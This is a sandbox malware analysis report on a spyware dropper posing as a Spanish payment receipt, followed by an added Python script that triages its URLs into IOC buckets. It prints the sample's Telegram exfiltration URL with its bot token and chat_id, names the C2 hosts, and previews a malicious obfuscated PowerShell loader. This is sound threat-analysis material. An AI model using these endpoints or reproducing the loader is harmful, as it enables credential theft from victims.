https://api.telegram.org/bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendDocument?chat_id=5234 | msiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://reallyfreegeoip.org/xml/ | msiexec.exe, 00000006.00000002.2936459320.0000000021AC0000.00000004.00000800.00020000.00000000.sdmp | false | - | high
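The URL tables above mix three kinds of strings: the sample's own exfiltration endpoints (the Telegram bot API with an embedded bot token and chat_id, the geolocation and IP-check services, and the dynamic-DNS hosts and raw IP on port 8081), Google Drive hosts contacted during the run, and library noise (NuGet, Pester, contoso.com, XML schema URIs) that sits in the memory of any PowerShell or .NET process. The Python below is an added example, not code from the report or from Joe Security: it triages a URL list from such a table into those buckets, pulls the Telegram bot token and chat_id out as IOCs, and returns the hosts worth hunting on. The bucket names, the noise-by-default rule, the dynamic-DNS suffix list and the decision to treat the Drive hosts as file hosting rather than command and control are my choices; the URL list is constructed from the report's strings with the extraction residue removed.

```python
"""Added example (not part of the Joe Sandbox report): triage a sandbox
'URLs from memory' list into IOC buckets and extract Telegram bot credentials."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed input: URL strings from this report's tables, with the memory-dump
# identifiers and the fused "false"/process-name residue stripped off.
SAMPLE_URLS = [
    "https://api.telegram.org/bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendDocument?chat_id=5234817354&caption=%20Pc%20Name:%20user",
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=",
    "https://reallyfreegeoip.org/xml/8.46.123.189",
    "http://checkip.dyndns.org/",
    "http://varders.kozow.com:8081",
    "http://aborters.duckdns.org:8081",
    "http://anotherarmy.dns.army:8081",
    "http://51.38.247.67:8081/_send_.php?L",
    "https://drive.usercontent.google.com/",
    "https://drive.google.com/",
    "http://schemas.xmlsoap.org/soap/encoding/",
    "https://contoso.com/License",
    "https://aka.ms/winsvr-2022-pshelp",
    "http://nsis.sf.net/NSIS_Error",
    "https://www.office.com/",
]

# Telegram bot API path: /bot<bot_id>:<35-char secret>/<method>. The token group is
# optional so that template strings such as "/bot/sendMessage" still classify.
TELEGRAM_PATH_RE = re.compile(r"^/bot(\d+:[A-Za-z0-9_-]{35})?/([A-Za-z]+)")
GEO_HOSTS = {"reallyfreegeoip.org", "checkip.dyndns.org", "checkip.dyndns.com"}
CLOUD_HOSTS = {"drive.google.com", "drive.usercontent.google.com"}
DYNDNS_SUFFIXES = (".duckdns.org", ".kozow.com", ".dns.army")  # assumption: my list
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
ODD_PORTS = {8081}


def classify(url):
    """Return a record with a 'category' and, for Telegram URLs, the extracted credentials."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    rec = {"url": url, "host": host, "port": parts.port}
    if host == "api.telegram.org":
        m = TELEGRAM_PATH_RE.match(parts.path)
        chat_id = parse_qs(parts.query).get("chat_id", [""])[0]  # blank values are dropped by parse_qs
        rec.update(category="telegram_c2",
                   bot_token=m.group(1) if m else None,
                   method=m.group(2) if m else None,
                   chat_id=chat_id or None)
    elif host in GEO_HOSTS:
        rec["category"] = "victim_geolocation"
    elif host in CLOUD_HOSTS:
        rec["category"] = "cloud_file_hosting"
    elif host.endswith(DYNDNS_SUFFIXES) or IPV4_RE.match(host) or parts.port in ODD_PORTS:
        rec["category"] = "alternate_c2"
    else:
        rec["category"] = "noise"  # library/doc strings: NuGet, Pester, contoso, schemas, ...
    return rec


def triage(urls):
    """Group classified records by category, preserving input order within each bucket."""
    buckets = {}
    for url in urls:
        rec = classify(url)
        buckets.setdefault(rec["category"], []).append(rec)
    return buckets


def telegram_credentials(urls):
    """Distinct (bot_token, chat_id) pairs; template strings without a token are dropped."""
    pairs = {(r["bot_token"], r["chat_id"])
             for r in triage(urls).get("telegram_c2", []) if r["bot_token"]}
    return sorted(pairs)


def hunt_hosts(urls):
    """Hosts worth searching proxy/DNS logs for: every bucket except noise, deduplicated."""
    hosts = {r["host"] for cat, recs in triage(urls).items() if cat != "noise" for r in recs}
    return sorted(hosts)


if __name__ == "__main__":
    for category, recs in triage(SAMPLE_URLS).items():
        print(f"{category}: {len(recs)}")
    print("telegram credentials:", telegram_credentials(SAMPLE_URLS))
    print("hunt hosts:", hunt_hosts(SAMPLE_URLS))
```

The geolocation and Drive hosts are kept in the hunt list but out of the C2 buckets on purpose: they are useful pivots in proxy logs (a process asking reallyfreegeoip.org for its own country is a strong signal in combination with the Telegram traffic), but blocking them outright would mostly generate false positives.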
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
142.250.181.1 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
104.21.67.152 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
172.217.19.174 | drive.google.com | United States | 15169 | GOOGLEUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1576296
Start date and time: 2024-12-16 18:27:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 30s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Justificante pago-09453256434687.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/16@5/5
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 182
• Number of non-executed functions: 110
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7528 because it is empty
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                      • VT rate limit hit for: Justificante pago-09453256434687.exe
Time | Type | Description
12:28:01 | API Interceptor | 39x Sleep call for process: powershell.exe modified
12:28:54 | API Interceptor | 5035x Sleep call for process: msiexec.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | l9IH82eiKw.exe | malicious | Unknown |
149.154.167.220 | l9IH82eiKw.exe | malicious | Unknown |
149.154.167.220 | pedido-035241.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger |
149.154.167.220 | QUOTATION REQUEST - BQS058.exe | malicious | MassLogger RAT |
149.154.167.220 | FT876567090.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | REQUEST FOR QUOTATION 1307-RFQ.exe | malicious | MassLogger RAT |
149.154.167.220 | PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe | malicious | VIP Keylogger |
149.154.167.220 | TEKLİF İSTEĞİ - TUSAŞ TÜRK HAVACILIK UZAY SANAYİİ_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | SWIFT091816-24_pdf.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | malicious | GuLoader, MassLogger RAT |
104.21.67.152 | pedido-035241.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger |
104.21.67.152 | QUOTATION REQUEST - BQS058.exe | malicious | MassLogger RAT |
104.21.67.152 | FT876567090.exe | malicious | Snake Keylogger, VIP Keylogger |
104.21.67.152 | ref_97024130865.exe | malicious | MassLogger RAT, PureLog Stealer |
104.21.67.152 | CITAS_pif.exe | malicious | MassLogger RAT |
104.21.67.152 | TEKLİF İSTEĞİ - TUSAŞ TÜRK HAVACILIK UZAY SANAYİİ_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger |
104.21.67.152 | PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | malicious | GuLoader |
104.21.67.152 | SWIFT091816-24_pdf.exe | malicious | GuLoader, MassLogger RAT |
104.21.67.152 | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | malicious | GuLoader, MassLogger RAT |
104.21.67.152 | SWIFT09181-24_pdf.exe | malicious | GuLoader, MassLogger RAT |
158.101.44.242 | pedido-035241.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | FT876567090.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | REQUEST FOR QUOTATION 1307-RFQ.exe | malicious | MassLogger RAT | checkip.dyndns.org/
158.101.44.242 | PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | malicious | GuLoader | checkip.dyndns.org/
158.101.44.242 | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
158.101.44.242 | Shipment 990847575203.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | 77541373_BESOZT00_2024_99101234_1_4_1.exe | malicious | MassLogger RAT | checkip.dyndns.org/
158.101.44.242 | hesaphareketi-01.pdf.exe | malicious | Snake Keylogger | checkip.dyndns.org/
158.101.44.242 | hesaphareketi-01.pdfsxlx..exe | malicious | Snake Keylogger | checkip.dyndns.org/
158.101.44.242 | Request for quote.doc | malicious | Snake Keylogger | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
checkip.dyndns.com | pedido-035241.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | QUOTATION REQUEST - BQS058.exe | malicious | MassLogger RAT | 193.122.6.168
checkip.dyndns.com | FT876567090.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
checkip.dyndns.com | REQUEST FOR QUOTATION 1307-RFQ.exe | malicious | MassLogger RAT | 158.101.44.242
checkip.dyndns.com | PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe | malicious | VIP Keylogger | 132.226.8.169
checkip.dyndns.com | ref_97024130865.exe | malicious | MassLogger RAT, PureLog Stealer | 193.122.130.0
checkip.dyndns.com | CITAS_pif.exe | malicious | MassLogger RAT | 132.226.8.169
checkip.dyndns.com | conferma..exe | malicious | MassLogger RAT | 132.226.8.169
checkip.dyndns.com | TEKLİF İSTEĞİ - TUSAŞ TÜRK HAVACILIK UZAY SANAYİİ_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
checkip.dyndns.com | PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | malicious | GuLoader | 158.101.44.242
reallyfreegeoip.org | pedido-035241.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.67.152
reallyfreegeoip.org | QUOTATION REQUEST - BQS058.exe | malicious | MassLogger RAT | 104.21.67.152
reallyfreegeoip.org | FT876567090.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
reallyfreegeoip.org | REQUEST FOR QUOTATION 1307-RFQ.exe | malicious | MassLogger RAT | 172.67.177.134
reallyfreegeoip.org | PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe | malicious | VIP Keylogger | 172.67.177.134
reallyfreegeoip.org | ref_97024130865.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.67.152
reallyfreegeoip.org | CITAS_pif.exe | malicious | MassLogger RAT | 104.21.67.152
reallyfreegeoip.org | TEKLİF İSTEĞİ - TUSAŞ TÜRK HAVACILIK UZAY SANAYİİ_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
reallyfreegeoip.org | PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | malicious | GuLoader | 104.21.67.152
reallyfreegeoip.org | SWIFT091816-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 104.21.67.152
api.telegram.org | l9IH82eiKw.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | l9IH82eiKw.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | pedido-035241.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | QUOTATION REQUEST - BQS058.exe | malicious | MassLogger RAT | 149.154.167.220
api.telegram.org | FT876567090.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | REQUEST FOR QUOTATION 1307-RFQ.exe | malicious | MassLogger RAT | 149.154.167.220
api.telegram.org | PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe | malicious | VIP Keylogger | 149.154.167.220
api.telegram.org | TEKLİF İSTEĞİ - TUSAŞ TÜRK HAVACILIK UZAY SANAYİİ_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | SWIFT091816-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | l9IH82eiKw.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | l9IH82eiKw.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | pedido-035241.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | dZKPE9gotO.exe | malicious | Vidar | 149.154.167.99
TELEGRAMRU | QUOTATION REQUEST - BQS058.exe | malicious | MassLogger RAT | 149.154.167.220
TELEGRAMRU | FT876567090.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | REQUEST FOR QUOTATION 1307-RFQ.exe | malicious | MassLogger RAT | 149.154.167.220
TELEGRAMRU | PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe | malicious | VIP Keylogger | 149.154.167.220
TELEGRAMRU | nB52P46OJD.exe | malicious | Vidar | 149.154.167.99
TELEGRAMRU | TEKLİF İSTEĞİ - TUSAŞ TÜRK HAVACILIK UZAY SANAYİİ_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
CLOUDFLARENETUS | https://docsend.com/v/ty7vw/up-date | malicious | Unknown | 172.67.182.24
CLOUDFLARENETUS | https://yxyz.zyxy.org/awjxs.captcha?u=c450c3eb-f121-4401-970f-d07fe840d263 | malicious | Unknown | 104.21.25.207
CLOUDFLARENETUS | 3gJQoqWpxb.bat | malicious | Unknown | 104.16.184.241
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig | 172.67.164.37
CLOUDFLARENETUS | wf1Ps82LYF.exe | malicious | LummaC | 104.21.50.161
CLOUDFLARENETUS | https://share.hsforms.com/1Izw71u6TTr2VFC-t9f1KFgsvgdj | malicious | Unknown | 104.18.142.119
CLOUDFLARENETUS | https://qrs.ly/gggdyxx | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | 236236236.elf | malicious | Unknown | 104.26.14.131
CLOUDFLARENETUS | https://tinyurl.com/ajdoea10dk66 | malicious | Unknown | 104.21.96.1
CLOUDFLARENETUS | IMAKBWPY.exe | malicious | LummaC | 172.67.219.27
ORACLE-BMC-31898US | pedido-035241.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 158.101.44.242
ORACLE-BMC-31898US | QUOTATION REQUEST - BQS058.exe | malicious | MassLogger RAT | 193.122.6.168
ORACLE-BMC-31898US | FT876567090.exe | malicious | Snake Keylogger, VIP Keylogger |
                                                                                                                                                              • 158.101.44.242
                                                                                                                                                              REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 158.101.44.242
                                                                                                                                                              ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                              • 193.122.130.0
                                                                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 193.122.130.0
                                                                                                                                                              PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              • 158.101.44.242
                                                                                                                                                              SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                              • 193.122.6.168
                                                                                                                                                              REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                              • 158.101.44.242
                                                                                                                                                              arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 147.154.242.4
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              54328bd36c14bd82ddaa0c04b25ed9adpedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0ehttps://docsend.com/v/ty7vw/up-dateGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              uZgbejeJkT.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              ni2OwV1y9u.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              KjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              cey4VIyGKh.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19ME-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              09-FD-94.03.60.175.07.xlsx.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              TEC-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              ME-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              09-FD-94.03.60.175.07.xlsx.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              TEC-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              InvoiceNr274728.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\nsj887A.tmp\nsExec.dllpedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                uu8v4UUzTU.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  uu8v4UUzTU.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    https://on-combine-data.s3.us-west-2.amazonaws.com/dealer-data/Share+Point/NTAS_MS3000X_Installer_v2.8.25_October2024_NO_UPS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      https://veryfast.ioGet hashmaliciousUnknownBrowse
                                                                                                                                                                        SecuriteInfo.com.W32.PossibleThreat.20282.14864.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          SecuriteInfo.com.W32.PossibleThreat.20282.14864.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            GrammarlyInstaller.evxSw76fmxki94ued2mj0c82.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              GrammarlyInstaller.evxSw76fmxki94ued2mj0c82.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                https://viture.com/windowsGet hashmaliciousUnknownBrowse
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 53158
Entropy (8bit): 5.062687652912555
Encrypted: false
SSDEEP: 1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5: 5D430F1344CE89737902AEC47C61C930
SHA1: 0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256: 395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512: DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious: false
Reputation: moderate, very likely benign file
Preview: PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                  Process:C:\Users\user\Desktop\Justificante pago-09453256434687.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (4095), with CRLF, LF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):68206
                                                                                                                                                                                  Entropy (8bit):5.172310613255284
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:JWm6iUoKIuR+xCKKijix19GzuQ47tUbYIj0ghf9:Em6imIuR3Ko194v4pUEiD9
                                                                                                                                                                                  MD5:F508128E1733BB6460B9B1532382ECF6
                                                                                                                                                                                  SHA1:B20F4E4AF3FE86A6DD5B7B10FCF983FAC5BF74C4
                                                                                                                                                                                  SHA-256:85B8BC66A411630746860C471286AB9BBC69BA93212E12DA8E75040DFB3A1A75
                                                                                                                                                                                  SHA-512:ACC7183911452359EC33582CDF6F5FF0953BC4F09F1F5475454D17277466ABC1F9B0218E8177735F9653665FBF55555BD557B86398C3D5A4A0D697B122E81731
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:$Kejsertiders=$Teardown;........$Processorkort = @'.Eftervi.Occulti$Navl.brLRepriseiDykningnAut gendAlliancsSor imetMisstylr Gash,noEuroko mostario=Rhotaci$NiobesiHKorts gaN ntroplBaandvrvFittitptFulgu arSster,neF mkampd AmylensAlbuebea,ornrooaSkrueblr Fljfl sMut.latfUf,rdradCh onics AlpehoeHistoril HyperssRig,thedLydighea brunheghelpingeO,tettenCrepenyeGalvani2Corrida3Fry,efu4Spr ked;Ne lefi.Afmilitf HemopouEsber snSulforicSkrddert X,losiiUnrecano ndtrren S utak NonderoP MesepieMontigeninitiatiProexerc Faunoli estinalUnde.walExpl.rai Orkan n pasmaegegenscr V gour Uintere(Olegbuf$AgonistAinsweeplT,eeshtm Tmrer oVandmndcS.nkholh IrvingoKi.ometdsagsom.eEkskommnUncorki,Algesia$RecandiYZym phot As.ocir Bagfuli storyen SuturegAfddtsvsImbod irFinitudu Tippe mSa.sonm)Weelfau Bjergba{energik.Hjerner. Chir p$heallbeKReth,asaCabbielstrv ekrsStraaliaEryngiut ,ncarvi Prenoto Semimane stalkeKurtsflr PrintenHa,sanieUltracrsUnplumm Hulkag(Kole,aeDUnt rree plitteb,isconsu H usyst Unell, Thallic'Pen
                                                                                                                                                                                  Process:C:\Users\user\Desktop\Justificante pago-09453256434687.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):313127
                                                                                                                                                                                  Entropy (8bit):7.659464645407278
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:fBXtVl2k39Ao5t5uQ3/+fLB8bNiX9px+Sf68lZuB3QMy1HAS6n30:fdtXzNAo5tb+d8g3gi3uiASw30
